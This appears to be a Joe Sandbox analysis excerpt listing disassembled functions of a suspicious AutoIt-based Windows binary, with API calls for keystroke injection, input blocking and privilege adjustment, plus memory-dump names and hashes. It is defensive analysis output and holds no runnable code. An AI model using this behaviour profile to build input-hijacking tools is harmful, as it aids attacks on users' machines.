                                                  Function 005FB226 Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 005FB25D
                                                  • keybd_event.USER32(?,75C0C0D0,?,00000000), ref: 005FB270
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: InputSendkeybd_event
                                                  • String ID:
                                                  • API String ID: 3536248340-0
                                                  • Opcode ID: 6dcc32296e6ce7dba4032580b2cf4eef0485009c4e8572702c36a6f68d9e41aa
                                                  • Instruction ID: 1d99ff43047f9313ba7da430d9928f44a96b255ab97a5f2a799b4a793d8c5369
                                                  • Opcode Fuzzy Hash: 6dcc32296e6ce7dba4032580b2cf4eef0485009c4e8572702c36a6f68d9e41aa
                                                  • Instruction Fuzzy Hash: 77F01D7580424DABEF159FA0C805BBE7FB5FF04315F109409F955A5191C37DC6119F94
                                                  Function 005F10BF Relevance: 3.0, APIs: 2, Instructions: 24COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,005F11FC), ref: 005F10D4
                                                  • CloseHandle.KERNEL32(?,?,005F11FC), ref: 005F10E9
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: AdjustCloseHandlePrivilegesToken
                                                  • String ID:
                                                  • API String ID: 81990902-0
                                                  • Opcode ID: d3abd2bf40052c691fdc39cd4a4a8714710eaeed214515807723ae7efb56be33
                                                  • Instruction ID: 61899273c8b19c78e36c938eb618fd379a62f5a6d89ec88130281cc1609964cb
                                                  • Opcode Fuzzy Hash: d3abd2bf40052c691fdc39cd4a4a8714710eaeed214515807723ae7efb56be33
                                                  • Instruction Fuzzy Hash: A3E04F32004A01EFE7352B61FC09E7B7BEDFB04320B20882DF5A5804B1DB626CA1DB54
                                                  Function 005C676B Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,005C6766,?,?,00000008,?,?,005CFEFE,00000000), ref: 005C6998
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: ExceptionRaise
                                                  • String ID:
                                                  • API String ID: 3997070919-0
                                                  • Opcode ID: b417a79793c1c407beb02a706bc215d7982fbcf9e12b9bac81ff47da6855e6c7
                                                  • Instruction ID: 4e1d55b87c6c5b6ef17ebc6aec985969a9571bcb41602c0163fc3460a8d5fdc1
                                                  • Opcode Fuzzy Hash: b417a79793c1c407beb02a706bc215d7982fbcf9e12b9bac81ff47da6855e6c7
                                                  • Instruction Fuzzy Hash: FCB10435610609DFDB19CF68C48AB657FE0FF45364F25865CE89ACB2A2C335EA91CB40
                                                  Function 005AB119 Relevance: 1.8, Strings: 1, Instructions: 511COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID: 0-3916222277
                                                  • Opcode ID: 91dd183926c0db01c11546e313452ec1817240c771bbd7c7d904609325f4f20e
                                                  • Instruction ID: 30065ac5f4e0204776881f1fdf7a92006f744e6e2d324cc6732374f6caa14e8b
                                                  • Opcode Fuzzy Hash: 91dd183926c0db01c11546e313452ec1817240c771bbd7c7d904609325f4f20e
                                                  • Instruction Fuzzy Hash: 55124E759002299FDF14CF59C8806BEBBB5FF49710F14859AE849EB256EB309E81CF90
                                                  Function 0060EAA2 Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • BlockInput.USER32(00000001), ref: 0060EABD
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: BlockInput
                                                  • String ID:
                                                  • API String ID: 3456056419-0
                                                  • Opcode ID: 4c651901ff11293934ac7b20ce2f26efc6f7a2c2e7b359c05ce4a58471e17474
                                                  • Instruction ID: 26b5411802b7cc59077aa440e44c1bacf722fcd25056b33c554818293d2214a2
                                                  • Opcode Fuzzy Hash: 4c651901ff11293934ac7b20ce2f26efc6f7a2c2e7b359c05ce4a58471e17474
                                                  • Instruction Fuzzy Hash: F7E01A322002159FD710EF59D808E9ABBEABF98760F008416FC49C73A1DA71A8418BA0
                                                  Function 005B09D5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,005B03EE), ref: 005B09DA
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterUnhandled
                                                  • String ID:
                                                  • API String ID: 3192549508-0
                                                  • Opcode ID: eed593a5dd8fdef3e11c083b5b174556de67d8cabc184ff7f90232629539b391
                                                  • Instruction ID: 500cb0f325e369c335bc9184adc2bae526c3c1f43d5cd1fda763a3e6e19c3381
                                                  • Opcode Fuzzy Hash: eed593a5dd8fdef3e11c083b5b174556de67d8cabc184ff7f90232629539b391
                                                  • Instruction Fuzzy Hash:
                                                  Function 005B781B Relevance: 1.5, Strings: 1, Instructions: 214COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 0
                                                  • API String ID: 0-4108050209
                                                  • Opcode ID: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                                  • Instruction ID: 42391102777ea59033e9271cbaf080d359128587170e8e4032033e8fa4c5bdf1
                                                  • Opcode Fuzzy Hash: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                                  • Instruction Fuzzy Hash: B1515A7160C70E5BDB384968885E7FE6F99BBDE340F180949F882E7282C615FE41D356
                                                  Function 00602046 Relevance: 1.3, Strings: 1, Instructions: 72COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 0&f
                                                  • API String ID: 0-3156573131
                                                  • Opcode ID: cfd7c7a113f45e24bc2e490915e2ff2820d876a1dd60742958f41cc3b5362e84
                                                  • Instruction ID: 714797d65f43ef3bed5c1654077ffe9f41d2040ec077073acadbfb5a0cf76953
                                                  • Opcode Fuzzy Hash: cfd7c7a113f45e24bc2e490915e2ff2820d876a1dd60742958f41cc3b5362e84
                                                  • Instruction Fuzzy Hash: D921A8326606128BD72CCE79C8276BA73E6AB54310F15862EE4A7C37D0DE75A904C740
                                                  Function 005C6DD9 Relevance: .6, Instructions: 637COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 680f1d3e7e1f3dd08d4c6a96f58e680318413b684295a77c7d6a4b239dd89ef4
                                                  • Instruction ID: a3aed60bce83f644dbaf48150abfdbf780b12ab8c979b53f93434eb207030b8f
                                                  • Opcode Fuzzy Hash: 680f1d3e7e1f3dd08d4c6a96f58e680318413b684295a77c7d6a4b239dd89ef4
                                                  • Instruction Fuzzy Hash: D6322331D28F054DD7239634D822335AA89BFBB3C5F14E72BE81AB5DA6EB28C4834540
                                                  Function 005ACC39 Relevance: .6, Instructions: 635COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1ad3fa34b40242ead8fad4e6360a6a9a8c5db124c2633d001d169838bbe77356
                                                  • Instruction ID: 9bc48e26edb96427fcb6a1c3002b3b0c4f7b668b29187b075e7b67011d8db586
                                                  • Opcode Fuzzy Hash: 1ad3fa34b40242ead8fad4e6360a6a9a8c5db124c2633d001d169838bbe77356
                                                  • Instruction Fuzzy Hash: 4232F931A041958BDF2CCF2AC4A467D7FA2FB46314F28856AD4EA9B691D230DD83DB41
                                                  Function 00597920 Relevance: .6, Instructions: 563COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 65369d035a321c6cbe69d28776ef833e5a8dda9a8765e83f80c9095f21d72fe0
                                                  • Instruction ID: 06184b61ad0643c7fe641293f95f5b7360e6ca1b6ab7fd5d4000a401d6fc5f02
                                                  • Opcode Fuzzy Hash: 65369d035a321c6cbe69d28776ef833e5a8dda9a8765e83f80c9095f21d72fe0
                                                  • Instruction Fuzzy Hash: 3B229070A0460ADFDF14CFA8D845AAEBBF6FF48300F14452AE816A7391EB35AD55CB50
                                                  Function 005991C0 Relevance: .5, Instructions: 475COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5568124d4b5e8b30431668d2bf992195b868cf0c7959137352872658abc4344d
                                                  • Instruction ID: d448299af248025ed72617b6c24c6db6509a60df227c923a498e27df093d5e8f
                                                  • Opcode Fuzzy Hash: 5568124d4b5e8b30431668d2bf992195b868cf0c7959137352872658abc4344d
                                                  • Instruction Fuzzy Hash: C902B8B0A00206EBDF15EF58D885AADBFB5FF44300F50856AE4169B391EB31EE51CB91
                                                  Function 005B1C77 Relevance: .3, Instructions: 254COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                  • Instruction ID: b86d428f9391bd24c51745c9cd8ad46a8b37c46763a9cdfd14659126db444cb9
                                                  • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                  • Instruction Fuzzy Hash: 209198721084E34EDBA9463E85740BEFFE17A923A135A079DD4F2CA1C5FE20E964D624
                                                  Function 005B19B0 Relevance: .2, Instructions: 240COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                  • Instruction ID: 31b0d22d7781b67e676e8a162905f9a9c1b87ed24418b0d9793586ecb7dc8a25
                                                  • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                  • Instruction Fuzzy Hash: DA91C6322098E34EDBAD427A85740BEFFE17A923A135A079DD4F2CA1C1FE14F554D624
                                                  Function 005B7A4A Relevance: .2, Instructions: 237COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: bee425c759e1dd10985b5bc306addfeb386125568c435ea35b044ea35e73df60
                                                  • Instruction ID: 8197d2a4a70b90e2709efa14437f21afc291e4d4b12adebc525953ce14236d70
                                                  • Opcode Fuzzy Hash: bee425c759e1dd10985b5bc306addfeb386125568c435ea35b044ea35e73df60
                                                  • Instruction Fuzzy Hash: 2061397120870E66DE7499288D9ABFE2F98FFCD700F240D19E942DB2D1E911BE42CB55
                                                  Function 005B1706 Relevance: .2, Instructions: 232COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                  • Instruction ID: b0a07fd77324ef964fa0a1518a94c1b48b4e8b82b402f6b9e51f217fcc3f4e3e
                                                  • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                  • Instruction Fuzzy Hash: F68198336084E34DDBAD423A85344BEFFE1BA923A135A079DE4F2CB1C1EE24E554D624
                                                  Function 00612ADE Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 486filecommemoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • DeleteObject.GDI32(00000000), ref: 00612B30
                                                  • DeleteObject.GDI32(00000000), ref: 00612B43
                                                  • DestroyWindow.USER32 ref: 00612B52
                                                  • GetDesktopWindow.USER32 ref: 00612B6D
                                                  • GetWindowRect.USER32(00000000), ref: 00612B74
                                                  • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00612CA3
                                                  • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00612CB1
                                                  • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00612CF8
                                                  • GetClientRect.USER32(00000000,?), ref: 00612D04
                                                  • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00612D40
                                                  • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00612D62
                                                  • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00612D75
                                                  • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00612D80
                                                  • GlobalLock.KERNEL32(00000000), ref: 00612D89
                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00612D98
